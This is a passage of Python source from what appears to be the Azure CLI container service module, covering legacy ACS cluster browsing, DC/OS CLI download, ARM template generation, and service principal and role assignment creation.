import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from urllib.error import URLError
from urllib.request import urlopen
import colorama
import dateutil.parser
import requests
import yaml
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_container_services,
get_auth_management_client,
get_graph_rbac_management_client,
get_resource_by_name,
)
from azure.cli.command_modules.acs._consts import (
ADDONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_ACR_DOMAIN_NAME,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_CANIPULL_IMAGE,
CONST_CONFCOM_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_NODEPOOL_MODE_USER,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
DecoratorEarlyExitException,
)
from azure.cli.command_modules.acs._helpers import get_snapshot_by_snapshot_id
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.acs._resourcegroup import get_rg_location
from azure.cli.command_modules.acs._validators import extract_comma_separated_string
from azure.cli.command_modules.acs.addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
)
from azure.cli.core._profile import Profile
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
AzureInternalError,
FileOperationError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ResourceNotFoundError,
ValidationError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.profiles import ResourceType
from azure.cli.core.util import in_cloud_console, sdk_no_wait
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
logger = get_logger(__name__)
# pylint: disable=unused-argument
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse / acs kubernetes browse / acs dcos browse / acs kubernetes get-credentials
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs browse
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos browse
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs dcos install-cli
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
            'Unsupported system {} for installing the dcos client.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
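# Worked example (illustrative): name="myCluster", resource_group_name="myResourceGroup"
# and a subscription id starting with "abcd12" produce the DNS prefix
# "myCluster-myResourceGroup-abcd12" (the name part is capped at 10 chars, the
# resource group part at 16).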
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
        # add the role assignment first, before saving the service principal
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create / osa command
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
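# Illustrative sketch (added for clarity; a hypothetical helper that the module never
# calls): shows the shape of the secret produced by _create_client_secret above,
# i.e. 20 hex characters from 10 random bytes plus the trailing '$'.
def _example_client_secret_format():
    secret = _create_client_secret()
    # e.g. '3fa9c0d1e2b74455a6b1$' (the value is random; only the format is fixed)
    return len(secret) == 21 and secret.endswith('$')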
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import ApplicationCreateParameters, GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
from azure.graphrbac.models import KeyCredential, PasswordCredential
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
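# Illustrative sketch (added for clarity; a hypothetical helper that the module never
# calls): passing only a password to _build_application_creds yields a single
# PasswordCredential valid for one year from now, while key_creds stays None.
def _example_password_credential():
    password_creds, key_creds = _build_application_creds(password='s3cret$')
    return password_creds is not None and key_creds is None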
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
from azure.graphrbac.models import ServicePrincipalCreateParameters
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except CLIError as ex:
logger.warning(str(ex))
except Exception as ex: # pylint: disable=broad-except
logger.error(str(ex))
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
